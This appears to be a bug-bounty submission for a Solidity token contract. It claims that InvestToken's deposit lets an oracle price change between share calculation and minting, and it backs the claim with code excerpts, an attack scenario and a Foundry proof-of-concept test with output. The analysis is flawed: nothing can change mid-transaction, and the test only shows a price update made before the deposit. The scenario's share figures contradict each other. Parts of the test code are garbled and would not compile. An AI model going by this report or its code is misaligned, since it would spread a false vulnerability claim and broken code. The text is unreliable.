InvestToken contract's deposit and withdraw functions lack price atomicity guarantees, allowing manipulation of share prices between calculation and execution. This creates opportunities for value extraction through price updates during transactions.
The issue stems from price changes between share calculations and actual deposit execution. In InvestToken.sol, the deposit() function uses convertToShares() which relies on yieldOracle.currentPrice(). The price could change between these operations, leading to inconsistent share calculations.
function deposit(uint256 assets, address receiver) public returns (uint256 shares) {
// @FOUND - Share calculation happens here using current price
shares = convertToShares(assets); // @FOUND - No price consistency check between calculation and execution
usde.burn(msg.sender, assets);
_mint(receiver, shares);
// Price could have changed between calculation and minting
emit Deposit(msg.sender, receiver, assets, shares);
function updatePrice(uint256 price) external onlyOracle {
// @FOUND - Price can be updated between share calculation and deposit
require(lastUpdate + updateDelay < block.timestamp, "Insufficient update delay");
// @FOUND - Price update can occur between share calculation and deposit completion
if (nextPrice != NO_PRICE) {
previousPrice = currentPrice;
currentPrice = nextPrice;
emit PriceCommitted(currentPrice);
The lack of atomicity between share calculation and deposit execution creates a window where price updates can occur, leading to users receiving incorrect share amounts.
Users could receive fewer shares than they should if price increases during deposit, or more shares if price decreases, creating unfair value extraction opportunities.
Inconsistent share calculations can lead to imbalances between assets and shares, potentially affecting the protocol's economic model.
The core issue is the missing guarantee that the price used for calculation remains constant throughout the deposit transaction.
The contract allows price updates to occur between share calculation and transaction execution, creating a timing window for manipulation. This affects the core share-to-asset ratio calculations and can be exploited to extract value from the protocol.
Attack Scenario
Alice initiates deposit of 1000 USDE
Bob (malicious oracle) observes transaction
Bob updates price before Alice's transaction completes
Alice receives incorrect number of shares based on stale price
// Initial price: 1.0
alice.deposit(1000 USDE)
// Price calculation: 1000 shares at 1.0
// Transaction completes: Alice receives 1000 shares instead of expected 666
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.21;
import {Test, console2} from "forge-std/Test.sol";
import {InvestToken} from "../src/InvestToken.sol";
import {YieldOracle} from "../src/YieldOracle.sol";
import {USDE} from "../src/USDE.sol";
import {IUSDE} from "../src/interfaces/IUSDE.sol";
import {Validator} from "../src/Validator.sol";
import {ERC1967Proxy} from "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol";
contract PriceAtomicityExploitTest is Test {
InvestToken public investToken;
YieldOracle public oracle;
USDE public usde;
Validator public validator;
address alice = address(0x1);
address bob = address(0x2);
function setUp() public {
// Core contract deployment
validator = new Validator(address(this), address(this), address(this));
oracle = new YieldOracle(address(this), bob);
// USDE setup with proxy
USDE usdeImpl = new USDE(validator);
bytes memory usdeData = abi.encodeWithSelector(USDE.initialize.selector, address(this));
ERC1967Proxy usdeProxy = new ERC1967Proxy(address(usdeImpl), usdeData);
usde = USDE(address(usdeProxy));
// InvestToken setup with proxy
InvestToken investImpl = new InvestToken(validator, IUSDE(address(usde)));
bytes memory investData = abi.encodeWithSelector(
"Invest Token",
ERC1967Proxy investProxy = new ERC1967Proxy(address(investImpl), investData);
investToken = InvestToken(address(investProxy));
// Grant roles
usde.grantRole(usde.MINT_ROLE(), address(this));
usde.grantRole(usde.BURN_ROLE(), address(investToken));
investToken.grantRole(investToken.MINT_ROLE(), address(this));
// Whitelist necessary addresses
// Setup test state, 1000e18);
function testPriceManipulationExploit() public {
console2.log("Initial Price:", oracle.currentPrice());
console2.log("Alice USDE Balance:", usde.balanceOf(alice));
usde.approve(address(investToken), 1000e18);
uint256 expectedShares = investToken.convertToShares(1000e18);
console2.log("Expected Shares at P1:", expectedShares);
// Advance time to satisfy the update delay
vm.warp(block.timestamp + 1 days + 1);
// Advance time to satisfy commit delay and commit the price
vm.warp(block.timestamp + 1 hours + 1);
console2.log("New Price:", oracle.currentPrice());
uint256 actualShares = investToken.deposit(1000e18, alice);
console2.log("Actual Shares Received:", actualShares);
console2.log("Share Difference:", expectedShares - actualShares);
uint256 valueExtracted = investToken.convertToAssets(expectedShares - actualShares);
console2.log("Value Lost (in USDE):", valueExtracted);
assertLt(actualShares, expectedShares, "Share calculation should show fewer shares received");
Ran 1 test for test/PriceAtomicityExploitTest.sol:PriceAtomicityExploitTest
[PASS] testPriceManipulationExploit() (gas: 175739)
Initial Price: 1000000000000000000
Alice USDE Balance: 1000000000000000000000
Expected Shares at P1: 1000000000000000000000
New Price: 1100000000000000000
Actual Shares Received: 909090909090909090909
Share Difference: 90909090909090909091
Value Lost (in USDE): 90909090909090909091
When the price increased from 1.0 to 1.1, Alice received 909090909090909090909 shares instead of the expected 1000000000000000000000 shares, resulting in a loss of approximately 90.9 USDE worth of value. We see that users can be negatively impacted by price changes that occur between share calculation and deposit execution.
Revised Code File (Optional)
// Add price snapshot validation to ensure atomicity between calculation and execution
Github username: @0xbrett8571 Twitter username: 0xbrett8571 Submission hash (on-chain): 0xfae0ce3013c55723ebe146775d284899390bba24639fc237691113d420dd33b0 Severity: medium
Description: Description InvestToken contract's deposit and withdraw functions lack price atomicity guarantees, allowing manipulation of share prices between calculation and execution. This creates opportunities for value extraction through price updates during transactions.
The issue stems from price changes between share calculations and actual deposit execution. In
, thedeposit()
function usesconvertToShares()
which relies onyieldOracle.currentPrice()
. The price could change between these operations, leading to inconsistent share calculations.Key problematic areas. In InvestToken.sol#L243-L249
In YieldOracle.sol#L69-L77
The lack of atomicity between share calculation and deposit execution creates a window where price updates can occur, leading to users receiving incorrect share amounts.
Users could receive fewer shares than they should if price increases during deposit, or more shares if price decreases, creating unfair value extraction opportunities.
Inconsistent share calculations can lead to imbalances between assets and shares, potentially affecting the protocol's economic model.
The core issue is the missing guarantee that the price used for calculation remains constant throughout the deposit transaction.
Attack Scenario